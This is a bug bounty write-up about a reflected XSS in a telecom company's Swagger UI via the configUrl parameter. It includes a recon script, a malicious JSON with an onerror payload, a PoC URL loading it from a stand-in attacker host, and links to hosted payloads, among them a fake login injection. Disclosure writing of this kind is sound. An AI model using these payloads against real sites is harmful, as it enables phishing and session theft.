A practical story of how automated recon, historical URL mining, and careful testing led to a Medium-severity Reflected XSS, responsibly disclosed to a major telecommunications company via HackerOne and rewarded with $400.

Hi,

I discovered a Reflected Cross-Site Scripting (RXSS) vulnerability in a production Swagger UI instance belonging to a large telecom organization.

The issue was responsibly disclosed through their bug bounty program on HackerOne, resulting in a $400 bounty.

Severity: Medium

Impact:

1. Arbitrary JavaScript execution

2. UI manipulation

3. Phishing injection potential

4. Abuse of trusted corporate domain

Recon Process

I followed a structured recon methodology combining automation and manual validation.

Subdomain Enumeration

Root domains were stored in scope.txt.

Tools used: subfinder, assetfinder

Results were merged, deduplicated, and filtered for in-scope targets.
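The in-scope filter is the step most prone to false positives, because a plain substring match on a root domain also keeps hosts such as example.com.evil.net. A minimal sketch of a stricter suffix match follows; the function name filter_in_scope and the example.com hosts are illustrative assumptions, not part of the original workflow.

```shell
#!/bin/bash

# Hypothetical helper: keep only hosts that equal a root domain
# or end with ".<root domain>".
#   $1    file with root domains, one per line (e.g. scope.txt)
#   stdin candidate hostnames, one per line
filter_in_scope() {
  awk '
    # First input (the scope file): remember every non-empty root domain.
    NR == FNR { if ($0 != "") roots[tolower($0)] = 1; next }
    # Second input (stdin): print the host if it matches any root domain.
    {
      host = tolower($0)
      for (r in roots) {
        suffix = "." r
        if (host == r || (length(host) > length(suffix) &&
            substr(host, length(host) - length(suffix) + 1) == suffix)) {
          print $0
          break
        }
      }
    }
  ' "$1" -
}

# Usage (assumes sub3.txt holds the deduplicated hostnames):
#   filter_in_scope scope.txt < sub3.txt > subdomain.txt
```

With a scope of example.com, this keeps api.example.com and example.com but drops example.com.evil.net and notexample.com, which a substring grep would let through.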

Subdomain Enumeration Script

#!/bin/bash

# Ask for the file listing the root domains (for example scope.txt)

read -r -p "file name: " file

# Subdomain collection

subfinder -dL "$file" -o subfinder_d.txt

while read -r in; do

assetfinder "$in" | tee -a assetfinder.txt

done < "$file"

# Merge results

cat subfinder_d.txt assetfinder.txt > sub.txt

rm assetfinder.txt subfinder_d.txt

# Normalize protocol

sed -i 's/http:\/\//https:\/\//g' sub.txt

# Deduplicate

sort -u sub.txt > sub3.txt

rm sub.txt

# Filter only in-scope domains (-F matches the domain literally, so "." is not a wildcard)

while read -r in; do

[ -n "$in" ] || continue

grep -F -- "$in" sub3.txt | tee -a subdomain.txt

done < "$file"

rm sub3.txt

Live Host Filtering

cat subdomain.txt | httpx-toolkit --silent | tee -a live.txt

This removed dead hosts and kept only reachable assets.

Historical URL Mining

Archived URLs often expose forgotten endpoints.

cat live.txt | waybackurls | tee -a urls.txt

Swagger instances frequently appear in:

- Staging deployments

- Internal API documentation

- Forgotten test environments

Targeted Grepping

grep "swagger-ui.html" urls.txt

That's where I found the vulnerable endpoint.
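Archived output usually contains the same endpoint many times with different query strings, and Swagger UI is not always served at swagger-ui.html. A minimal sketch of a slightly wider search that also collapses duplicates is shown here; the function name find_swagger_urls and the extra path patterns (swagger/index.html, api-docs) are my assumptions about common deployments, not something taken from this target.

```shell
#!/bin/bash

# Hypothetical helper: list unique Swagger-looking endpoints from a URL file.
#   $1  file with one URL per line (defaults to urls.txt)
find_swagger_urls() {
  # Case-insensitive match on a few common Swagger paths (assumed patterns),
  # then drop query strings and fragments so duplicates collapse.
  grep -Ei 'swagger-ui|swagger/index\.html|api-docs' "${1:-urls.txt}" \
    | sed 's/[?#].*$//' \
    | LC_ALL=C sort -u
}

# Usage:
#   find_swagger_urls urls.txt | tee swagger_candidates.txt
```

Each candidate still needs manual validation, since many of these archived URLs will no longer resolve or will point at a patched Swagger UI version.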

Vulnerability Details

The Swagger UI endpoint accepted:

/swagger-ui.html?configUrl=

The configUrl parameter allowed loading external JSON configuration files.

Missing Security Controls:

❌ No origin validation

❌ No whitelist enforcement

❌ No sanitization of remote content

This allowed loading attacker-controlled external JSON.

Proof of Concept

Malicious JSON (External File):

{

"swagger": "2.0",

"info": {

"title": "<img src=x onerror=alert(document.domain)>",

"version": "1.0"

},

"paths": {}

}

Hosted externally, then accessed via:



/swagger-ui.html?configUrl=https://attacker-site.com/malicious.json

Result:

✅ JavaScript executed

✅ Confirmed Reflected XSS
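The same test URL can be assembled for any Swagger UI endpoint found during recon. A minimal sketch, where build_test_url is a hypothetical helper and api.example.com stands in for a real in-scope host; the configUrl value is passed unencoded, as in the PoC above.

```shell
#!/bin/bash

# Hypothetical helper: build a configUrl test URL for a Swagger UI endpoint.
#   $1  discovered Swagger UI URL (any existing query string is dropped)
#   $2  URL of the externally hosted JSON file
build_test_url() {
  local base=$1
  base=${base%%[?#]*}   # cut everything from the first "?" or "#"
  printf '%s?configUrl=%s\n' "$base" "$2"
}

# Usage:
#   build_test_url "https://api.example.com/swagger-ui.html" \
#                  "https://attacker-site.com/malicious.json"
```

Opening the printed URL in a browser and watching for the alert is still a manual step; the helper only removes the repetitive string editing.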

Alert-Based RXSS PoC

I used a malicious Swagger configuration file at:

https://xss.smarpo.com/test.json
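One practical detail when hosting such a file: Swagger UI fetches it from the victim's browser, so, assuming a cross-origin fetch, the host serving the JSON would need to send an Access-Control-Allow-Origin header or the browser will block the response. A small sketch for checking that from response headers; has_cors_header is a hypothetical helper name.

```shell
#!/bin/bash

# Hypothetical helper: succeed if the HTTP response headers on stdin
# contain an Access-Control-Allow-Origin header (header names are
# case-insensitive, hence -i).
has_cors_header() {
  grep -qi '^access-control-allow-origin:'
}

# Usage (needs network access):
#   curl -sI "https://attacker-site.com/malicious.json" | has_cors_header \
#     && echo "CORS header present"
```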

Extended Impact: Fake Login Injection

To demonstrate realistic exploitation risk, I injected a fake login template inside Swagger UI.

https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

Key Takeaways

1️⃣ Swagger UI Can Be Dangerous When Misconfigured

2️⃣ Historical Recon Is Gold

3️⃣ Automation + Manual Validation Wins

Responsible Disclosure

The issue was:

- Privately reported

- Properly documented

- Verified by the security team

- Rewarded with 💰 $400

Small misconfigurations. Real impact.

Always test beyond the obvious — and disclose responsibly.

If you enjoyed this writeup, feel free to connect or follow my work on security research and bug bounty findings.

Sharing knowledge helps the security community grow. Stay safe, keep hunting, and disclose responsibly.